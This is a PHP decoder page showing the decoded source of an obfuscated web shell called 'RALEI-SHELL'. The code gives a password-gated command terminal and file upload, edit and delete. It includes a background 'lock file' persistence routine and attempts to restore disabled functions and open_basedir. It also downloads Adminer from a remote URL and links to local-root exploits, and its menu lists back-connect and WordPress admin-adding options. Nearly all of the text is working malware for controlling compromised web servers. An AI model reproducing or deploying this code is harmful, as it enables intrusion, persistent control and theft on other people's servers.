Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // pliz mas jgn nge recode wkwk // copyright rahmanralei 2023 @clearstatcache(..

Decoded Output download

<?php  
// pliz mas jgn nge recode wkwk  
// copyright rahmanralei 2023  
@clearstatcache();  
@mb_internal_encoding('UTF-8');  
@set_time_limit(0);  
error_reporting(0);  
 goto Gwr5s; bPZB4: $modalClock = "<form method="post">" . "<div class="mb-4">" . "<label for="filename-input" class="form-label">File Name</label>" . "<input type="text" class="form-control" name="filok" id="filename-input" required placeholder="Enter file name to l\303\xb8cked">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="lokfil" id="addNewFile">Lock Now</button>" . "</div>" . "</form>"; goto bXXTk; V8syj: ?>  
- <span><?php  goto fg2Cp; MKNta: function curl_req($u) { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); $o = curl_exec($c); curl_close($c); return $o; } goto S97wg; xN1dV: ini_restore("allow_url_fopen"); goto RJZ6S; GljT3: function modalpost($title, $label, $form, $icon = '', $text = '', $hidden = false, $size = false) { $titles = str_replace(" ", '', strtolower($title)); $labels = str_replace(" ", '', strtolower($label)); $hidden_attr = $hidden ? "d-none" : ''; $size = $size ? "modal-fullscreen-lg-down" : ''; return "<div class="modal fade zoomIn" id="" . $titles . "" tabindex="-1" aria-labelledby="" . $titles . "_Label" aria-hidden="true">" . "<div class="modal-dialog modal-dialog-centered " . $size . "">" . "<div class="modal-content">" . "<div class="modal-header p-3 bg-soft-primary">" . "<h5 class="modal-title" id="" . $titles . "_Label">" . $title . "&nbsp; <i class="fad " . $icon . ""></i></h5>" . "<button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>" . "</div>" . "<div class="modal-body">" . $form . "</div>" . "</div>" . "</div>" . "</div>" . "<button class="btn btn-outline-light " . $hidden_attr . " me-2" data-bs-toggle="modal" data-bs-target="#" . $titles . "" data-bs-toggle2="tooltip" data-bs-placement="top" data-bs-title="" . $title . ""><i class=" " . $icon . "">" . $text . "</i></button>"; } goto Zbqxa; SwLyI: function formatBytes($size, $precision = 2) { $u = array("B", "KB", "MB", "GB", "TB"); $b = max($size, 0); $pow = floor(($b ? log($b) : 0) / log(1024)); $pow = min($pow, count($u) - 1); $b /= pow(1024, $pow); return round($b, $precision) . " " . $u[$pow]; } goto YUX2m; KNMNH: echo function_exists("curl_version") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto L3Eg1; yMi02: ?>  
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-code-slash"></i> Perl:</span><?php  goto iadoK; LfSDA: ?>  
</span></span></div></div></div></div><?php  goto PpmRX; dPqA6: echo modalpost("Create File", "File Name", $modalCfile, "fad fa-file-circle-plus"); goto OZW8u; bXXTk: $modalCsearch = "<form method="POST"> 
      <div class="mb-3">\xa        <div class="w-100">\xa          <textarea class="form-control bg-black text-success" id="seroutput" name="seroutput" rows="25" readonly></textarea>\xa        </div> 
      </div>\xa      <div class="mb-3 d-flex">\xa        <input type="text" class="form-control bg-black text-success" id="sercing" name="sercing" placeholder="Search Name...">\xa      <button type="submit" class="btn bg-black text-light float-end ms-2"><i class="fad fa-search"></i></button> 
</div> 
    </form>"; goto jyDMo; S97wg: function get_tree_path($path) { $canonical_path = realpath($path); $path_parts = explode("/", $canonical_path); $tree_path = ''; $current_path = ''; foreach ($path_parts as $part) { $current_path .= $part . "/"; $tree_path .= "<a class='text-truncate fst-normal text-light text-decoration-none' href='?getdir=" . $current_path . "'>" . $part . "</a> / "; } $tree_path = rtrim($tree_path, "/ "); return $tree_path; } goto Sw0vr; Sw0vr: function leijson() { $lei = "https://rhmansh.github.io/RALEI-SHELL/json/ralei.json"; if (ini_get("allow_url_fopen")) { $jd = file_get_contents($lei); } else { $jd = curl_req($lei); } $d = json_decode($jd, true); return $d; } goto j4A33; IBFMi: ?>  
</div></div><div class="row mb-2"><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-toggle2-off"></i> Disable Function:</span><?php  goto yQvhJ; SOZKH: ?>  
"><i class="fad fa-search"></i></a> <a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="github"data-bs-toggle2="tooltip"href="https://github.com/rhmansh"><i class="bi bi-github"></i></a></div></div></div></div></div></div><?php  goto q9Zuh; gKZcJ: $vartn = isset($_POST["command"]) ? $defcmd . " " . $_POST["command"] : $defcmd; goto AfZc1; pdgfd: if (isset($getdir)) { if (isset($_POST["create_file"])) { $file_name = $_POST["file_name"]; $filepath = $getdir . "/" . $file_name; if (file_exists($filepath)) { echo "<div class='alert alert-danger'>File sudah ada.</div>"; } else { if (touch($filepath)) { echo "<div class='alert alert-success'>File baru berhasil dibuat.</div>"; } else { $filecreate = fopen($filepath, "w"); if ($filecreate == false) { echo "<div class='alert alert-danger'>Tidak dapat membuat file baru.</div>"; } else { fclose($filecreate); echo "<div class='alert alert-success'>File baru berhasil dibuat.</div>"; } } } } if (isset($_POST["create_folder"])) { $folder_name = $_POST["folder_name"]; $folderpath = $getdir . "/" . $folder_name; if (mkdir($folderpath) == false) { echo "<div class='alert alert-danger'>Tidak dapat membuat folder.</div>"; } else { echo "<div class='alert alert-success'>Folder baru berhasil dibuat.</div>"; } } echo " 
<div class="row mb-2"> 
  <div class="col-12">\xa    <div class="card border border-light">\xa      <div class="card-body d-flex flex-wrap justify-content-center"> 
          <a href="?getdir=" . $getdir . "&ex=terminal" class="btn btn-ralei me-2 mb-2">Terminal</a> 
          <a href="?getdir=" . $getdir . "&ex=adminer" class="btn btn-ralei me-2 mb-2">Adminer</a>\xa          <a href="?getdir=" . $getdir . "&ex=scanrot" class="btn btn-ralei me-2 disabled mb-2">Scan R\xc3\xb8\xc3\270t</a>\xa          <a href="?getdir=" . $getdir . "&ex=portscan" class="btn btn-ralei disabled me-2 mb-2">Port Scan</a> 
          <a href="?getdir=" . $getdir . "&ex=backconn" class="btn btn-ralei disabled me-2 mb-2">Back Conn3ct</a> 
          <a href="?getdir=" . $getdir . "&ex=wpadd" class="btn btn-ralei disabled me-2 mb-2">Add Admin (WP)</a>\xa          <a href="?getdir=" . $getdir . "&ex=lokfil" class="btn btn-ralei me-2 mb-2">L\xc3\270ck File</a>\xa          <a href="?getdir=" . $getdir . "&ex=lockfile2" class="btn btn-ralei me-2 position-relative mb-2">Lock File 2<span class="position-absolute top-0 start-50 translate-middle badge bg-info">LINUX\xa  </span></a> 
          <a href="https://github.com/rhmansh/Localr-ot-ALL-CVE" target="_blank" class="btn btn-ralei me-2 mb-2">Localro\xc3\xb8t</a> 
          <a href="?getdir=" . $getdir . "&ex=kill_me" class="btn btn-ralei2 me-2 mb-2" onclick="return confirm('Sure?')">Kill Self</a>\xa          <a href="?getdir=" . $getdir . "&ex=keluar" class="btn btn-ralei me-2 mb-2">Logout</a> 
          <a href="?getdir=" . $getdir . "&ex=retmi" class="btn btn-ralei me-2 mb-2">Readme</a> 
      </div> 
    </div>\xa  </div> 
</div>\xa    <form method="post">\xa    <div class="row mb-2"> 
     <div class="col-12"> 
     <div class="card border border-light"> 
     <div class="card-body">\xa      <div class="table-responsive">\xa       <table class="table table-dark table-striped text-nowrap"> 
        <thead class="text-light">\xa         <tr> 
          <th scope="col"><input id="cbox-all" class="form-check-input" type="checkbox">&ensp;Names</th>\xa          <th scope="col">Types</th> 
          <th scope="col">Sizes</th>\xa          <th scope="col">Last Modded</th>\xa          <th scope="col">UID/GID</th> 
          <th scope="col">Permissions</th> 
          <th scope="col">Actions</th>\xa         </tr>\xa        </thead> 
        <tbody>"; if (is_dir($getdir)) { if (is_readable($getdir)) { $filescn = scandir($getdir); $filescn = array_filter($filescn, function ($fileye) { return strcmp($fileye, ".") !== 0; }); if ($filescn !== false) { function get_file_owner($path) { if (IS_WIN) { return fileowner($path) . "/" . filegroup($path); } else { $uid = fileowner($path); return posix_getpwuid($uid)["name"] . "/" . posix_getgrgid(filegroup($path))["name"]; } } function get_file_perms($path) { if (IS_WIN) { return substr(sprintf("%o", fileperms($path) & 4095), -3); } else { return substr(sprintf("%o", fileperms($path)), -3); } } foreach ($filescn as $filey) { $getpath = $getdir . "/" . $filey; $getpath = trim($getpath); if (is_file($getpath)) { echo "<tr>"; echo "<td><input class='form-check-input' type='checkbox' name='cekbox[]' value='" . $getpath . "'>&ensp;<i class="fad fa-files" style="--fa-primary-opacity: 0.5; --fa-secondary-opacity: 1;"></i>&ensp;<a class="text-light text-decoration-none" href='?getfile=" . $getpath . "'>" . $filey . "</a></td>"; echo "<td><span class="text-" . (is_writable($getpath) ? "success" : (is_readable($getpath) ? "white" : "danger")) . "">[ File ]</span></td>"; $filesize = filesize($getpath); echo "<td>" . formatBytes($filesize) . "</td>"; echo "<td>" . date("d-m-Y/H:i", filemtime($getpath)) . "</td>"; $fileowner = get_file_owner($getpath); echo "<td>" . $fileowner . "</td>"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "<td class='text-success'>" . $perms . "</td>"; } else { if (is_readable($getpath)) { echo "<td class='text-light'>" . $perms . "</td>"; } else { echo "<td class='text-danger'>" . $perms . "</td>"; } } echo "<td>" . twomenu("?getfile=" . $getpath) . "</td>"; echo "</tr>"; } elseif (is_dir($getpath)) { echo "<tr>"; echo "<td><input class='form-check-input' type='checkbox' name='cekbox[]' value='" . $getpath . "'>&ensp;<i class="text-warning fad fa-folders" style="--fa-secondary-opacity: 1;"></i>&ensp;<a class="text-light text-decoration-none" href='?getdir=" . $getpath . "'>" . $filey . "</a></td>"; echo "<td><span class="text-" . (is_writable($getpath) ? "success" : (is_readable($getpath) ? "white" : "danger")) . "">[ Dir ]</span></td>"; echo "<td>-</td>"; echo "<td>-</td>"; $fileowner = get_file_owner($getpath); echo "<td>" . $fileowner . "</td>"; $perms = cekPerm($getpath); if (is_readable($getpath) && is_writable($getpath)) { echo "<td class='text-success'>" . $perms . "</td>"; } else { if (is_readable($getpath)) { echo "<td class='text-light'>" . $perms . "</td>"; } else { echo "<td class='text-danger'>" . $perms . "</td>"; } } echo "<td>" . twomenu("?getfile=" . $getpath) . "</td>"; echo "</tr>"; } } } else { displayAlert("Failed to open directory : {$getdir}", "danger"); } } else { displayAlert("{$getdir} : Path not readable.", "danger"); } } else { displayAlert("{$getdir} : Not a valid directory path.", "danger"); } echo " </tbody> 
       </table> 
      </div>\xa      </div> 
      </div>\xa     </div>\xa    </div>\xa  <div class="row py-2"> 
    <div class="col-3"> 
          <div class="form-group d-flex"> 
            <select class="form-select col-3 col-sm-4 me-2 bg-dark text-warning" name="maction">\xa    <option value="hapus">Delete</option> 
    <option value="cemode">Chmod</option>\xa</select>\xa<input type="text" class="form-control col-3 col-sm-4 me-2" name="cemod" placeholder="0777" style="display: none;">\xa<button type="submit" name="massact" class="btn btn-warning ms-auto">Submit</button> 
          </div> 
        </div> 
  </div>\xa</form>"; }  
if(isset($_GET['ex']) && $_GET['ex'] == "lokfil") { function lockFile($file) { global $getdir; $file = $getdir . '/' . $file; $dir = sys_get_temp_dir() . '/.s'; $textFile = $dir . '/' . base64_encode($file) . '-t'; $handlerFile = $dir . '/' . base64_encode($file) . '-h'; $targetDir = dirname($file); if (file_exists($textFile)) unlink($textFile); if (file_exists($handlerFile)) unlink($handlerFile); if (!file_exists($dir)) mkdir($dir); if (!copy($file, $textFile)) { displayAlert("False, Please Check Filename", "danger"); return; } if (!chmod($file, 0444)) { displayAlert("Locked Status False", "danger"); return; } $handler = <<<EOD  
<?php  
@ini_set("max_execution_time", 0);  
while (file_exists("$file")) {  
    if (!file_exists("$file")) {  
        \$t = base64_encode(file_get_contents("$textFile"));  
        file_put_contents("$file", base64_decode(\$t));  
    }  
    if (fileperms("$file") !== 33060) {  
        chmod("$file", 0444);  
    }  
    if (fileperms("$targetDir") !== 33261) {  
        chmod("$targetDir", 0555);  
    }  
}  
EOD; if (!file_put_contents($handlerFile, $handler)) { displayAlert("Failed To Handler File", "danger"); return; } if (IS_WIN) { excmd("start /B php $handlerFile > NUL 2>NUL"); } else { excmd("php $handlerFile > /dev/null 2>/dev/null &"); } displayAlert("Locked Status True", "success"); } }  
if (isset($_POST['lokfil'])) {  
    lockFile($_POST['filok']);  
}  
goto JIcP4; Acaur: if (isset($_POST["command"])) { $command = $_POST["command"]; $jsoncmd = excmd($command, $getdir); $rescmd = $jsoncmd; if ($rescmd === false) { $error = "error"; echo $error; } else { echo $rescmd; } die; } goto lvt26; lu_RQ: ?>  
</div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-py"></i> Python:</span><?php  goto XL0iB; L3Eg1: ?>  
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-filetype-rb"></i> Ruby:</span><?php  goto jYFEI; u7qY1: function excmd($koman, $dir = null) { $fff = array("shell_exec", "exec", "system", "passthru"); $o = null; if ($dir !== null) { $koman = "cd "" . $dir . "" && " . $koman; } foreach ($fff as $func) { if (function_exists($func)) { $o = $func($koman); if ($o !== null) { $o = utf8_encode($o); $json = json_encode($o); if ($json !== false) { if (trim($o) === '') { $err = ''; return $err; } return $o; } } } } if (strpos(strtolower($o), "command not found") !== false) { $err = "Command not found."; } else { $err = "No suitable function found to execute the command."; } return $err; die; } goto Acaur; OZW8u: echo modalpost("Create Folder", "Folder Name", $modalCfolder, "fad fa-folder-plus"); goto N5d1G; lvt26: if (isset($_GET["ex"]) && $_GET["ex"] == "keluar") { session_destroy(); header("Refresh: 0; url={$_SERVER["PHP_SELF"]}"); die; } goto C2o3f; Y7joY: @clearstatcache(); goto tTGul; IU1Xg: echo modalpost("Upload File", "Select File", $modalUpload, "fad fa-upload"); goto dPqA6; Nqyb1: function span($text, $color) { return "<span class="text-" . $color . "">" . $text . "</span>"; } goto gDQyA; pZLfW: if (isset($_GET["ex"]) && $_GET["ex"] == "upload") { if (isset($_FILES["upfile"])) { function upFil($f, $d) { if (move_uploaded_file($f["tmp_name"], $d)) { return true; } return false; } $upfile = $_FILES["upfile"]; $upfiltodir = isset($_GET["getdir"]) ? $_GET["getdir"] : ''; $desfil = $upfiltodir . "/" . $upfile["name"]; if (upFil($upfile, $desfil)) { displayAlert("Success Upload In" . $desfil, "success"); } else { displayAlert("Failed Upload In " . $desfil, "danger"); } } } goto Mrb2A; EGi9S: echo "{$_SERVER["SERVER_SOFTWARE"]}"; goto EOEix; fgSyv: echo getcwd(); goto uGapP; N5d1G: ?>  
<a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="searching"data-bs-toggle2="tooltip"href="<?php  goto flT2x; RJZ6S: ini_restore("safe_mode"); goto SexdO; wBzEb: function getUserGroupInfo() { $username = get_current_user(); if (function_exists("posix_getuid") && function_exists("posix_getgid")) { $uid = posix_getuid(); $gid = posix_getgid(); $groupinfo = posix_getgrgid($gid); $groupname = $groupinfo["name"]; } else { $uid = getmyuid(); $gid = getmygid(); $groupname = "?"; } return "<span class='text-success'>{$username} ({$uid}) / {$groupname}</span>"; } goto SwLyI; yQvhJ: $disabledFunc = getDisabledFunctions(); goto KdUFm; ib1xY: @ini_set("max_execution_time", 0); goto rHz1f; uGapP: ?>  
"><i class="fad fa-house"></i></a> <a class="btn btn-outline-light me-2 font-weight-bold"data-bs-placement="top"data-bs-title="Refresh"data-bs-toggle2="tooltip"href="#"onclick="location.replace(location.href)"><i class="fad fa-rotate"></i> </a><?php  goto IU1Xg; jyDMo: $defcmd = "> " . termnotasi(); goto gKZcJ; XL0iB: echo function_exists("python") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto Jtcyo; i0xkR: ?>  
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Server IP:</span> <span class="text-success"><?php  goto kBm3K; Wy3xc: function displayAlert($msg, $type) { echo "<div class="alert alert-" . $type . " alert-dismissible fade show border-light" role="alert">\xa              " . $msg . " 
              <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> 
          </div>"; } goto MKNta; Jtcyo: ?>  
</div></div><div class="row mb-2"><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-terminal"></i> OS:</span><?php  goto lh6vq; rHz1f: @ini_set("output_buffering", 0); goto qanfw; Ztzcw: function getDisabledFunctions() { $d = ini_get("disable_functions"); $arr = array(); if ($d) { foreach (explode(",", $d) as $func) { $arr[] = $func; } } return $arr; } goto Wy3xc; RJWH8: $cekfopenon = ini_get("allow_url_fopen"); goto H6Tp2; lEKGy: if (isset($_POST["change_permission"])) { $permission = intval($_POST["permission"], 8); if (chmod($getfile, $permission)) { displayAlert("Change Permission OK!", "success"); } else { displayAlert("Change Permission FAILED!", "danger"); } } goto JGZ79; j84KU: @set_time_limit(0); goto ib1xY; pHDy4: function cekPerm($f) { if (IS_WIN) { $perms = @fileperms($f) & 4095; } else { $perms = @fileperms($f); } $mode = ''; $mode .= $perms & 256 ? "r" : "-"; $mode .= $perms & 128 ? "w" : "-"; $mode .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $mode .= $perms & 32 ? "r" : "-"; $mode .= $perms & 16 ? "w" : "-"; $mode .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $mode .= $perms & 4 ? "r" : "-"; $mode .= $perms & 2 ? "w" : "-"; $mode .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); $permis = substr(sprintf("%o", $perms), -3); $res = "(" . $permis . ") " . $mode; return $res; } goto u7qY1; Hs_m8: define("IS_WIN", strtoupper(substr(PHP_OS, 0, 3)) === "WIN"); goto LfI7x; Fxsb6: $getfile = isset($_GET["getfile"]) && !empty($_GET["getfile"]) ? IS_WIN ? str_replace("\", "/", $_GET["getfile"]) : $_GET["getfile"] : null; goto Ztzcw; AfZc1: $modalCmd = "<form id="formcmd" method="POST">\xa      <div class="mb-3">\xa        <div class="w-100"> 
          <textarea class="form-control bg-black text-success font-monospace" id="rescmd" name="rescmd" rows="25" readonly></textarea> 
        </div>\xa      </div>\xa      <div class="mb-3 d-flex"> 
        <input type="text" class="form-control bg-black text-success font-monospace" id="command" name="command" placeholder="" . $vartn . ""> 
        <button type="submit" class="btn bg-black text-light float-end ms-2"> 
          <span class="spinner-border spinner-border-sm d-none" role="status" aria-hidden="true"></span> 
          <span class="visually-hidden">Loading...</span> 
          <i class="fad fa-send"></i> 
        </button> 
      </div>\xa    </form>"; goto pHDy4; xFpoT: ?>  
<div class="row mb-2"><div class="col-12"><div class="border-light card"><div class="d-flex card-body"style="overflow:auto"><span class="text-warning flex-grow-1 mb-0 text-decoration-none"><i class="fa-duotone fa-folder-open"style="--fa-secondary-opacity:0.7"></i><?php  goto S9YqN; W6n8o: ?>  
<!doctypehtml><html data-bs-theme="dark"lang="id"><head><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><meta content="noindex, nofollow"name="robots"><meta content="no-cache, must-revalidate, post-check=0, pre-check=0"http-equiv="cache-control"><meta content="0"http-equiv="expires"><meta content="no-cache"http-equiv="pragma"><title><?php  goto Od1fM; ZHQre: function twomenu($g) { $d = $_SERVER["DOCUMENT_ROOT"]; $c = count(explode("/", $d)) - 1; $p = trim(dirname(str_replace("?getfile=", '', $g)), "/"); $f = basename($g); $r = array_slice(explode("/", $p), $c); $u = $_SERVER["HTTP_HOST"] . "/" . implode("/", $r) . "/" . $f; $h = "<div class="btn-group" style="letter-spacing: 3px;"><button type="button" class="btn btn-dark" data-bs-toggle="dropdown" aria-expanded="false"><i class="fad fa-gear"></i></button><ul class="dropdown-menu">"; $h .= "<li><a style="font-size: 13px;" class="dropdown-item text-light" href="" . $g . ""><i class="fad fa-pen-to-square"></i> EDIT</a></li>"; $h .= "<li><a style="font-size: 13px;" class="dropdown-item text-light" href="https://" . trim($u) . "" target="_blank"><i class="fad fa-globe"></i> VIEW</a></li>"; $h .= "</ul></div>"; return $h; } goto wBzEb; SexdO: ini_restore("open_basedir"); goto RJWH8; AkcPy: echo phpversion(); goto GVhMk; tWlkv: ?>  
</span></div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-person"></i> User (ID) / Group:</span><?php  goto Zxvrr; wFaVC: if (isset($_GET["loginlei"])) { $submitted_pass = isset($_GET["pwdlei"]) ? $_GET["pwdlei"] : ''; if (md5($submitted_pass) == $auth_pass) { $_SESSION["masuk"] = $auth_pass; } else { echo "<script>alert('Paswd Salah! Km Mw Nikung Yh? :v');</script>"; login_ralei(); } } goto SlGUD; NLzar: ?>  
<?php  goto qdLwq; kocnX: echo !empty($disabledFunc) ? "danger" : "success"; goto KmulI; gDQyA: if (isset($_GET["ex"]) && $_GET["ex"] == "adminer") { function gadminer($cek) { $lei = leijson()["lei"]; $php_url = $lei[0]; $css_url = $lei[1]; $php = $cek ? file_get_contents($php_url) : curl_req($php_url); $css = $cek ? file_get_contents($css_url) : curl_req($css_url); $a = "adminer.php"; $b = "adminer.css"; if (!file_exists($a) || filesize($a) == 0) { if (file_exists($a)) { unlink($a); unlink($b); } if (!file_put_contents($b, $css) || !file_put_contents($a, $php)) { die("Failed to create adminer"); } } include $a; } gadminer($cekfopenon); } goto ZHQre; OvkMa: $modalCfile = "<form method="post">" . "<div class="mb-4">" . "<label for="filename-input" class="form-label">File Name</label>" . "<input type="text" class="form-control" name="file_name" id="filename-input" required placeholder="Enter file name">" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="create_file" id="addNewFile">Create</button>" . "</div>" . "</form>"; goto C0BHX; M2vPM: if (isset($getfile)) { if (file_exists($getfile)) { function to_dir() { global $getdir; $url = $_SERVER["REQUEST_URI"]; $to = preg_replace("/(\?|&)getfile=/", "$1getdir=", $url); $go = dirname($to); echo "<script> setTimeout(function() {window.location = '{$go}'; }, 1000);</script>"; } function read_file($filename) { $lines = file($filename); return implode('', $lines); } if ($cekfopenon) { $file_contents = is_file($getfile) ? file_get_contents($getfile) : ''; } else { $file_contents = is_file($getfile) ? read_file($getfile) : ''; } echo "\xa    <div class="row mb-2">\xa    <div class="col-6"> 
    <div class="card border border-light">\xa    <div class="card-body">\xa    <form method="post"> 
    <div class="form-group"> 
        <label class="text-light">Name:</label>\xa        <input type="text" class="form-control" id="namafile" name="new_name" value="" . basename($getfile) . "">\xa    </div>\xa    <div class="py-2"> 
    <input type="submit" class="btn btn-sm btn-outline-light" style="width:100%;"  name="rename" value="Rename"> 
    </div> 
    </form> 
    </div> 
    </div> 
    </div>\xa    "; echo "<div class="col-6"> 
  <div class="card border border-light">\xa  <div class="card-body"> 
  <form method="post"> 
  <div class="form-group"> 
    <label class="text-light">Permission</label>\xa    <input type="text" class="form-control" name="permission" value="" . @substr(sprintf("%o", fileperms($getfile)), -4) . ""> 
  </div> 
  <div class="py-2"> 
  <input type="submit" class="btn btn-sm btn-outline-light" style="width:100%;" name="change_permission" value="Change"> 
  </div> 
  </form> 
  </div> 
  </div> 
  </div> 
 </div> 
 "; echo " 
    <div class="row mb-2"> 
    <div class="col-12"> 
    <div class="card border border-light">\xa    <div class="card-body">    \xa    <form method="post">\xa    <div class="mb-3"> 
    <p class="text-light text-truncate text-center mb-3"># " . basename($getfile) . "</p>\xa    <textarea class="form-control" id="textarea" name="isifile" rows="10">" . htmlentities($file_contents) . "</textarea>        
    </div> 
    <div class="d-flex d-grid gap-2 justify-content-center">\xa    <input type="submit" class="btn btn-outline-light" name="save_file" value="Update">\xa    <input type="button" class="btn btn-outline-light" onclick="savefrom('textarea')" value="Download">    \xa    </div>\xa    </form> 
    </div>\xa    </div>\xa    </div>\xa    </div> 
    "; } else { displayAlert("{$getfile} : Not a valid file path!", "danger"); } } goto pdgfd; mwAc1: echo !empty($disabledFunc) ? implode(", ", $disabledFunc) : "None"; goto VRGnu; kBm3K: echo "{$_SERVER["SERVER_ADDR"]}"; goto R8Gse; qanfw: ini_restore("disable_functions"); goto xN1dV; eD2Ck: ?>  
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-cursor"></i> Curl:</span><?php  goto KNMNH; zzU8_: echo function_exists("mysql_version") ? "<span class="text-success">ON</span>" : "<span class="text-danger">OFF</span>"; goto eo9oy; qwjLI: echo php_uname(); goto tWlkv; C2o3f: if (isset($_GET["ex"]) && $_GET["ex"] == "kill_me") { unlink(__FILE__); die("OK"); } goto eZ1vu; Mrb2A: if (isset($_GET["ex"]) && $_GET["ex"] == "lokfil") { if (isset($_POST["lokfil"])) { } echo modalpost("L\303\xb8ck File", "Input File Name", $modalClock, "fa-lock", '', true); echo "<script> 
    window.onload = function() { 
      var getModalok = document.querySelector("[data-bs-target='#l\303\270ckfile']");\xa      getModalok.addEventListener("click", function(event) { 
        event.preventDefault();\xa      });\xa      getModalok.click();\xa    }\xa  </script>"; } goto M2vPM; LfI7x: $getdir = isset($_GET["getdir"]) && !empty($_GET["getdir"]) ? IS_WIN ? str_replace("\", "/", $_GET["getdir"]) : $_GET["getdir"] : (isset($_GET["getfile"]) ? dirname($_GET["getfile"]) : getcwd()); goto Fxsb6; Gwr5s: session_start(); goto Y7joY; Zbqxa: $modalUpload = "<form action="?getdir=" . $getdir . "&ex=upload" method="post" enctype="multipart/form-data">" . "<div class="mb-4">" . "<label for="file-input" class="form-label">Select File</label>" . "<input type="file" class="form-control" name="upfile" id="file-input" required>" . "</div>" . "<div class="hstack gap-2 justify-content-end">" . "<button type="button" class="btn btn-outline-danger" data-bs-dismiss="modal">Close</button>" . "<button type="submit" class="btn btn-primary" name="submit_file" id="uploadFile">Upload</button>" . "</div>" . "</form>"; goto OvkMa; DPQLU: ?>  
</div><div class="col-12"><span class="fw-bold text-light"><i class="bi bi-hdd-stack"></i> Your IP:</span> <span class="text-success"><?php  goto TNQio; VKQfC: @mb_internal_encoding("UTF-8"); goto j84KU; AZ5Qx: if (isset($_GET["ex"]) && $_GET["ex"] == "terminal") { echo modalpost("Command 5hell", "Input Command", $modalCmd, "fa-rectangle-terminal", '', true, true); echo "<script> 
    window.onload = function() {\xa      var getModalCmd = document.querySelector("[data-bs-target='#command5hell']"); 
      getModalCmd.addEventListener("click", function(event) {\xa        event.preventDefault();\xa      }); 
      getModalCmd.click();\xa    } 
  </script>"; } goto pZLfW; Zxvrr: echo getUserGroupInfo(); goto DPQLU; VRGnu: ?>  
</span></div></div><div class="row"><div class="col-12 d-flex justify-content-between"><a class="btn btn-outline-light me-2 ms-2"data-bs-placement="top"data-bs-title="Kerang"data-bs-toggle2="tooltip"href="?getdir=<?php  goto fgSyv; q9Zuh: if (isset($_POST["massact"])) { if (isset($_POST["cekbox"])) { $maction = $_POST["maction"]; $cekbox = $_POST["cekbox"]; foreach ($cekbox as $cek) { if ($maction == "hapus") { if (is_dir($cek)) { if (rrmdir($cek)) { displayAlert("Success Deleted Dir: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed To Deleted Dir: <b>" . basename($cek) . "</b>", "danger"); } } else { if (unlink($cek)) { displayAlert("Success Deleted File: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed To Deleted File: <b>" . basename($cek) . "</b>", "danger"); } } } elseif ($maction == "cemode") { $chmod = intval($_POST["cemod"], 8); if (is_dir($cek)) { if (chmod($cek, $chmod)) { displayAlert("Success changed mode for directory: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed to change mode for directory: <b>" . basename($cek) . "</b>", "danger"); } } elseif (is_file($cek)) { if (chmod($cek, $chmod)) { displayAlert("Success changed mode for file: <b>" . basename($cek) . "</b>", "success"); } else { displayAlert("Failed to change mode for file: <b>" . basename($cek) . "</b>", "danger"); } } } } } } goto wB8Oc; tTGul: error_reporting(0); goto VKQfC; R8Gse: ?>  
</span></div><div class="col-6"><span class="fw-bold text-light"><i class="bi bi-database"></i> Mysql:</span><?php  goto zzU8_; mubNe: function termnotasi() { if (IS_WIN) { $u = getenv("USERNAME"); $h = getenv("COMPUTERNAME"); } else { $u = posix_getpwuid(posix_geteuid())["name"]; $h = gethostname(); } return "{$u}@{$h}: ~ $ "; } goto GljT3; KmulI: ?>  
"><?php  goto mwAc1; cmASg: ?>  
</title><link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"rel="stylesheet"crossorigin="anonymous"integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"><link href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css"rel="stylesheet"><link href="https://fonts.googleapis.com/css2?family=Exo+2:wght@600&display=swap"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/main.css"rel="stylesheet"><link href="https://rhmansh.github.io/RALEI-SHELL/assets/css/icon.css"rel="stylesheet"><script src="https://unpkg.com/@popperjs/core@2"></script><script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js"crossorigin="anonymous"integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script><script src="https://rhmansh.github.io/RALEI-SHELL/assets/js/app.js"></script></head><body><div class="preloader"><div class="loder"></div></div><style></style><div class="container-fluid zoom-in"><div 